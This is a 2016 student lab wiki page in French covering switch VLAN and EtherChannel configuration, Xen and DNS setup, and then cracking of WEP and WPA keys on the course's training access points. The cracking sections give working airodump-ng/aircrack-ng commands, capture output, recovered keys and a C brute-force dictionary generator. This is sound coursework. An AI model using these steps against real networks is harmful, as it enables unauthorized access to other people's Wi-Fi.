Cahier 2016 groupe n°7

De Wiki de Projets IMA
Révision datée du 7 novembre 2016 à 11:43 par Jbielle (discussion | contributions) (Craquage de clé WPA)

Cahier des charges

Mise en réseau des commutateurs 6006 en E304

Avancement du travail

Configuration du 6006

-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10

-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11

-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.

La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :

1 Switch-E304>enable
2 Switch-E304#vlan database
3 Switch-E304(vlan)#vlan x name nameX
4 Switch-E304(vlan)#exit

La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :

1 Switch-E304>enable
2 Switch-E304#conf t
3 Switch-E304(config)#interface GigabitEthernet 4/x
4 Switch-E304(config-if)#switchport
5 Switch-E304(config-if)#switchport access vlan x
6 Switch-E304(config-if)#no shutdown
7 Switch-E304(config-if)#end
8 Switch-E304#write memory (enregistrer la configuration)

Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :

5 Switch-E304(config-if)#switchport mode trunk

Installation de xen

 xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie 
 --dir=/usr/local/xen --gateway=193.48.57.172

Configuration d'une EtherChannel

Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.

Voici la commande à rentrer dans l'interface de configuration du commutateur :

1 Switch-E304>enable
2 Switch-E304#conf t
3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32
4 Switch-E304(config-if)#switchport
5 Switch-E304(config-if)#switchport mode trunk
6 Switch-E304(config-if)#channel-protocol lacp
7 Switch-E304(config-if)#channel-group 1 mode passive
8 Switch-E304(config-if)#no shutdown
9 Switch-E304(config-if)#end
10 Switch-E304#write memory (enregistrer la configuration)  

Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.

Serveur DNS et DNSSEC avec bind

La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi. Il faut alors se diriger sur la rubrique :Gérer les Glue records. A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :

nom du serveur : ns.bielloumutherfucker.space

IP : 193.48.57.167

On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique modifier les serveurs DNS :

DNS1 : ns.bielloumutherfucker.space

DNS2 : ns6.gandi.net (serveur secondaire de Gandi)

...

Crackage de clé WEP

Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP. Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2

On obtient l'écran suivant :

CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         
                                                                                                                                    
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                    
04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              
04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 
04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 
04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 
04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  
04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         <length:  0>                                                
04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 
04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         <length:  0>                                               
04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 
44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  
                                                                                                                                    
BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            
                                                                                                                                     
04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   
04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   
04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   
04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   
04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   
04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   
04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   
04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   
(not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   
(not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   
44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2

Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :

airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2

On obtient l'écran suivant :

CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         
                                                                                                                                    
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                    
04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             
                                                                                                                                    
BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           
                                                                                                                                    
04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 

Une fois le fichier de capture créé, nous avons exécuter la commande

aircrack cracotte06-01.cap

afin débuter le crackage de la clé WEP.

On obtient le résultat suivant en quelques minutes :

                [00:01:53] Tested 279622 keys (got 31535 IVs)
  KB    depth   byte(vote)
   0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) 
   1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) 
   2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) 
   3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) 
   4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) 
   5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) 
   6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) 
   7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) 
   8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) 
   9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) 
  10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) 
  11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) 
  12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) 
            KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] 

Decrypted correctly: 100%

La clé a été trouver et sa valeur est "EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44"

Craquage de clé WPA

Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute.

Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant :

#include <stdio.h>
#include <stdlib.h>
#define MAX_NUM 99999999
int main(){
long chiffre = 0;
FILE* fp = NULL;
fp = fopen("dictionnaire.txt","a+");
	if (fp != NULL){
		for (chiffre=0;chiffre< MAX_NUM + 1;chiffre++)
		{
		fprintf(fp,"%08li\n",chiffre);
		}
	fclose(fp);
	}
return 0;
}

Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA :

1. On bascule l'interface wifi en mode monitor :

airmon-ng start wlan2

2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA :

airodump-ng --encrypt WPA wlan2

On obtient le résultat suivant :

00:19:07:C5:0F:A4  -44        7        8    2   1  54e. WPA2 CCMP   MGT  PolytechLille                                              
00:19:07:C5:0F:A2  -48        5        0    0   1  54e. WPA2 CCMP   PSK  <length:  1>                                               
00:19:07:C5:0F:A5  -48        6        0    0   1  54e. WPA2 CCMP   PSK  <length:  1>                                               
00:19:07:C5:0F:A3  -50        7        0    0   1  54e. WPA2 CCMP   PSK  PolytechGuests                                             
00:19:07:C5:0F:A1  -50        7        0    0   1  54e. WPA2 CCMP   MGT  <length:  1>                                               
00:19:07:C5:0F:A7  -52        6        0    0   1  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         
00:19:07:C5:0F:A6  -52        5        0    0   1  54e. WPA2 CCMP   MGT  <length:  1>                                               
00:19:07:C5:0F:A0  -54        6        2    0   1  54e. WPA2 CCMP   MGT  LILLE1                                                     
00:19:07:C5:0F:A8  -55        5        5    0   1  54e. WPA2 CCMP   MGT  eduroam                                                    
04:DA:D2:9C:50:53  -62        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte04                                                 
04:DA:D2:9C:50:52  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte03                                                 
04:DA:D2:9C:50:58  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte09                                                 
04:DA:D2:9C:50:50  -66        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte01                                                 
04:DA:D2:9C:50:55  -65        6        0    0  13  54e. WPA2 CCMP   PSK  cracotte06                                                 
04:DA:D2:9C:50:56  -65        3        0    0  13  54e. WPA2 CCMP   PSK  cracotte07                                                 
04:DA:D2:9C:50:59  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte10                                                 
04:DA:D2:9C:50:54  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte05                                                 
04:DA:D2:9C:50:57  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte08                                                 
04:DA:D2:9C:50:51  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte02                                                 
04:DA:D2:CF:01:91  -69        2        0    0   5  54e. WPA2 CCMP   MGT  <length:  1>                                               
C8:00:84:84:00:53  -70        3        0    0   9  54e. WPA2 CCMP   PSK  PolytechGuests                                             
C8:00:84:84:00:52  -71        4        0    0   9  54e. WPA2 CCMP   PSK  <length:  1>                                               
04:DA:D2:CF:01:98  -70        2        0    0   5  54e. WPA2 CCMP   MGT  eduroam                                                    
04:DA:D2:CF:01:90  -71        3        0    0   5  54e. WPA2 CCMP   MGT  LILLE1                                                     
04:DA:D2:CF:01:95  -72        2        0    0   5  54e. WPA2 CCMP   PSK  <length:  1>                                               
04:DA:D2:CF:01:97  -72        2        0    0   5  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         
04:DA:D2:CF:01:96  -72        2        0    0   5  54e. WPA2 CCMP   MGT  <length:  1>

3. Nous décidons de cracker cracotte09, on lance un airodump sur son essid et on effectue une capture

airodump-ng -w cracotte09 --encrypt wpa -c 13 -essid cracotte09 wlan05

4. On lance le aircrack avec le fichier de capture et notre dictionnaire généré précédemment :

aircrack-ng -w dictionnaire.txt cracotte09-01.cap

5. Au bout de 57:55 minutes, nous avons obtenu la clé suivante :

passphrase : 12399909